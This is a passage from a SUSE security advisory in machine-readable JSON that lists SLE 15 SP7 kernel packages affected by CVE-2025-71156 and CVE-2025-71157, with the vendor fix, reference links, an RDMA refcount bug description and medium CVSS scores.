"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71156",
"url": "https://www.suse.com/security/cve/CVE-2025-71156"
},
{
"category": "external",
"summary": "SUSE Bug 1257167 for CVE-2025-71156",
"url": "https://bugzilla.suse.com/1257167"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71156"
},
{
"cve": "CVE-2025-71157",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71157"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/core: always drop device refcount in ib_del_sub_device_and_put()\n\nSince nldev_deldev() (introduced by commit 060c642b2ab8 (\"RDMA/nldev: Add\nsupport to add/delete a sub IB device through netlink\") grabs a reference\nusing ib_device_get_by_index() before calling ib_del_sub_device_and_put(),\nwe need to drop that reference before returning -EOPNOTSUPP error.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71157",
"url": "https://www.suse.com/security/cve/CVE-2025-71157"
},
{
"category": "external",
"summary": "SUSE Bug 1257168 for CVE-2025-71157",
"url": "https://bugzilla.suse.com/1257168"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
